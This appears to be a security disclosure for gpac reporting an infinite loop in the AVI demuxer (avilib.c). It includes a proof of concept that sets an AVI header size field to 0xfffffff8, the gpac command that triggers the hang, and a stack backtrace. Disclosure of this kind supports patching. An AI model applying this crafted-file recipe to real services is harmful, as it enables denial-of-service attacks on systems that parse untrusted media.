Description

A inf loop security issue in gpac/gpac

Proof of Concept

The issue occurs in code: src/media_tools/avilib.c#L1974, when the gpac avidmx filter parses the AVI format file.

choose a simple AVI format file, the data’s header is as follows in xxd mode

$ xxd ./1.avi | head -n 2
00000000: 5249 4646 e81b 0100 4156 4920 4c49 5354  RIFF....AVI LIST
00000010: c222 0000 6864 726c 6176 6968 3800 0000  ."..hdrlavih8...

Use vim in xxd mode, to change the header’s size member hex data to 0xfffffff8(-8), the modified data is as follows

$ xxd ./1.avi| head -n 2
00000000: 5249 4646 e81b 0100 4156 4920 4c49 5354  RIFF....AVI LIST
00000010: c222 0000 6864 726c 6176 6968 f8ff ffff  ."..hdrlavih....

Then run command with avidmx filter, you will observe an inf loop situation.

./gpac -i ./1.avi -o 123 avidmx

Its stack backtrack is as follow

#0  __strncasecmp_l_avx () at ../sysdeps/x86_64/multiarch/strcmp-sse42.S:166
#1  0x00007ffff7a5c62c in avi_parse_input_file.part () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#2  0x00007ffff7a5e9f7 in AVI_open_input_file () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#3  0x00007ffff7bf11d9 in avidmx_process () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#4  0x00007ffff7baced0 in gf_filter_process_task () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#5  0x00007ffff7b9abc4 in gf_fs_thread_proc () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#6  0x00007ffff7b9fb2b in gf_fs_run () from /mnt/data/gpac/gpac-32/bin/gcc/libgpac.so.11
#7  0x0000555555564a5a in gpac_main ()